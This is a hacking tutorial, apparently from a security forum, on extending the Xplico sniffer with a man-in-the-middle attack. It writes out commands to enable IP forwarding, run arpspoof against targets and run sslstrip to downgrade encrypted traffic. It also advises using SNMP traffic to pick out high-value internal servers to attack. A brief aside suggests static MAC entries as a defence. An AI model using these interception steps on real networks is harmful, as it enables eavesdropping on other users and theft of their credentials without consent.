Xplico: Making it more effective.


Honestly, there's not a lot below quick summary: enabling Arp Spoofing and SSL strip turn up the heat on XPLICO related sniffing.

Now that you have a basic understanding of Xplico, and possibly read into my previous tutorials its time to combine some attacks.

If you have a stand alone box with only Xplico, but it isn't a bridge device, off a Port Span, or TAP then your only receiving the local machines traffic, this just isn't enough.

In order to change that you can force the traffic with ARP spoofing, it's also possible to use some other things such as DNS spoofing and other methods but its not covered below. The reason for this exception is quite honestly the unfortunate lack of switch based security used in Internal Networks, or any sort of ARP monitoring softwares for that matter. It's all too easy to ARP spoof (as well as over run a cam table) for fun, mischief, and security related purposes.

As much as I hate to recommend it for Admins, this is the reason you should hard code MAC's for your *Important* devices as well as primary gateway. Arp floops ARE effective, but when Gratuitus ARP packets aren't accepted for a host as well as the switch never having to ask "Who has x.x.x.x, it's an easy enough method to thwart them. Unfortunately this comes at a cost, when replacing devices, network issues are immediately to follow which is COMMONLY overlooked(Yes YOU network admins). This is also not an option for some large orginizatoins because many "Newer" clustering protocols use GARP to publish the active member to your switches.

For anyone that doesn't understand ARP then I highly reccomend you take a look over the following pages, for networking in general it's imporant you understand ARP.

2. http://wiki.wireshark.org/Gratuitous_ARP

Given the above info lets take my previous tutorial Sniffing Various Passwords: https://soldierx.com/tutorials/Sniffing-Various-Passwords-MITM-DSNIFF-an...

Enable Arp Spoofing:

#echo 1 > /proc/sys/net/ipv4/ip_forward

#arpspoof -t [& >/dev/null]

Rant and Note: Focusing your attack is VERY important. Generally for most sniffing you want traffic destined for the Default Gateway (Outbound network traffic) however sometimes you will need to attack individual targets (ie. Authentication Servers, Web Proxies, Storage systems, or other important systems).

Curiously enough, SNMP protocol is a a giant pointer in most large companies, the fact is only important servers (in a very small percentage all servers) in a network are monitored by SNMP. Sniffing SNMP traffic is a quick way to focus your efforts in internal network pwnage if your goal is the not end user data. Monitored systems generally have the "goods" or important roles (enough to monitor right). Even when using SNMPv3, while you may not be able to openly read it, it's a giant arrow to servers rather than end user machines. To summarize, if it's sending SNMP traffic, it's worth targeting typically.

To add insult to injury if your routing is pushed with updates then you also have helped potential hackers map out your internal goodies. Think wisely before you decide to choose ANY "automated" functions to help reduce networking work.

Remove SSL Protection:

#sslstrip -a -w encrypted.txt

At this point all your SSL traffic is stripped, Xplico is accepting your other traffic and Arp spoofing is forcing other various systems traffic through your host.

Building from there, take for example one of numbs tutorials (http://soldierx.com/tutorials/Penetrating-Secure-Websites-Increasing-Att...)

Using DNS enumeration techniques combined with host mapping is another way to increase your attack vectors. Once you have more resources identified you can further tailor an attack to fit your needs.